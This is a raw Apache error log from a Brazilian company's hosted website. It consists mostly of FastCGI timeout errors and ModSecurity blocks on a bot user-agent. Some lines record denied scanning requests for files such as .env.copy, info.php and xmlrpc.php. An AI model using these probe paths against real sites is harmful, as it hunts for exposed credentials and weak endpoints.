[Sun Mar 15 13:37:21.049828 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:37:27.734193 2026] [access_compat:error] [pid 21946:tid 140411540502272] [client 4.239.241.168:61439] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.copy
[Sun Mar 15 13:37:28.145430 2026] [access_compat:error] [pid 21533:tid 140411683178240] [client 4.239.241.168:60922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.copy
[Sun Mar 15 13:37:42.058090 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:38:05.117784 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:38:28.129806 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:38:28.567261 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.244.31:35514] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbghHjZBu2q05ozVU_hvAAAAVI"]
[Sun Mar 15 13:38:49.057769 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:39:11.049927 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35274] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:39:29.485132 2026] [access_compat:error] [pid 21805:tid 140411691570944] [client 4.239.241.168:53832] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Sun Mar 15 13:39:29.743886 2026] [access_compat:error] [pid 11972:tid 140411624429312] [client 4.239.241.168:34454] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Sun Mar 15 13:39:33.422789 2026] [access_compat:error] [pid 21805:tid 140411741927168] [client 4.239.241.168:53832] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Sun Mar 15 13:39:33.451280 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:39:35.107312 2026] [access_compat:error] [pid 11972:tid 140411741927168] [client 4.239.241.168:34512] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Sun Mar 15 13:39:55.093876 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:40:10.615894 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.228.16:42108] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbg6nbQATo66fKoS7zVnAAAAMs"]
[Sun Mar 15 13:40:16.125896 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35990] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:40:38.121781 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36224] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:41:00.129798 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:41:30.121807 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:42:01.157795 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37258] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:42:25.112779 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37492] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:42:46.045996 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:43:07.133848 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38064] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:43:28.125897 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:43:52.121975 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:43:54.547622 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:42072] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbhytSswJuvopo3lOj0fgAAAIo"]
[Sun Mar 15 13:44:14.693811 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:44:37.117863 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39420] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:44:59.133801 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:45:21.104094 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:45:30.926298 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.228.16:36168] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbiKnjZBu2q05ozVU_ivQAAAVA"]
[Sun Mar 15 13:45:42.712554 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:46:04.121250 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40252] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:46:26.129768 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:46:51.093180 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:47:22.125793 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:47:50.126289 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41272] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:48:11.121828 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:48:32.127330 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:48:54.122483 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:49:03.240743 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.244.31:35060] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbi_7ABkC4fWIHEf8F6vQAAAEQ"]
[Sun Mar 15 13:49:16.045841 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:49:37.133841 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:49:58.121809 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:50:20.045800 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42650] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:50:42.834848 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.228.16:57708] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbjYrABkC4fWIHEf8F62AAAAEk"]
[Sun Mar 15 13:50:43.155618 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42816] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:51:04.125794 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:51:25.127978 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43116] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:51:46.125780 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:52:12.033909 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43444] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:52:40.125813 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:53:09.125821 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:53:32.125819 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:53:55.122555 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:54:16.129837 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44218] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:54:20.446892 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.244.31:53462] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbkPNSswJuvopo3lOj1iQAAAJg"]
[Sun Mar 15 13:54:38.125809 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44374] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:54:59.125859 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44536] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:55:20.132065 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:55:42.123211 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:56:06.081881 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:56:09.315262 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:35496] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbkqbABkC4fWIHEf8F7lgAAAEs"]
[Sun Mar 15 13:56:27.126897 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:56:48.107659 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:57:10.121837 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:57:34.127043 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45540] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:58:02.033890 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:58:30.114685 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:58:54.121916 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46218] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:59:17.161793 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:59:30.238403 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:47368] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abblctSswJuvopo3lOj2VAAAAIM"]
[Sun Mar 15 13:59:39.125833 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46714] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:00:00.131302 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47042] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:00:21.129796 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:00:42.902154 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:01:04.125802 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:01:13.806147 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.228.16:39960] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbl2dSswJuvopo3lOj2jAAAAIQ"]
[Sun Mar 15 14:01:28.049887 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47844] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:01:50.131429 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:02:11.057830 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:02:33.033879 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:02:55.125811 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:03:16.119445 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49014] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:03:52.121803 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:04:16.049870 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:04:39.089801 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49858] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:04:50.183432 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.244.31:52780] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbmsnbQATo66fKoS7zYYQAAANM"]
[Sun Mar 15 14:05:00.274172 2026] [access_compat:error] [pid 21533:tid 140411565680384] [client 78.174.193.63:20518] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Sun Mar 15 14:05:01.129965 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:05:23.129817 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:05:44.127452 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:06:05.057996 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:06:26.129672 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50888] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:06:32.119021 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.228.16:42128] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbnGLABkC4fWIHEf8F82QAAAEY"]
[Sun Mar 15 14:06:48.132195 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51154] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:07:09.126114 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:07:30.127793 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:07:52.132487 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51742] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:08:13.121992 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:08:34.133833 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:08:55.125134 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52378] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:09:17.125785 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:09:39.133789 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52938] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:09:52.657544 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.244.31:40400] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbn4LABkC4fWIHEf8F9LwAAAEg"]
[Sun Mar 15 14:10:00.122920 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:10:24.050162 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:10:46.129815 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53700] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:11:07.057823 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53838] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:11:28.124754 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54008] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:11:49.121859 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:12:11.337815 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:12:33.125805 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:12:54.071674 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:13:15.125810 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:13:36.122641 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55302] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:13:57.128427 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:14:18.046172 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55616] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:14:39.130848 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:15:00.141819 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:15:22.069841 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56294] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:15:46.121876 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:16:08.141818 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56604] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:16:30.129860 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:16:51.121816 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:17:32.121814 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:18:01.121794 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:18:22.122754 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:18:43.133822 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:19:05.141771 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58460] AH01075: Error dispatching request to : (polling)
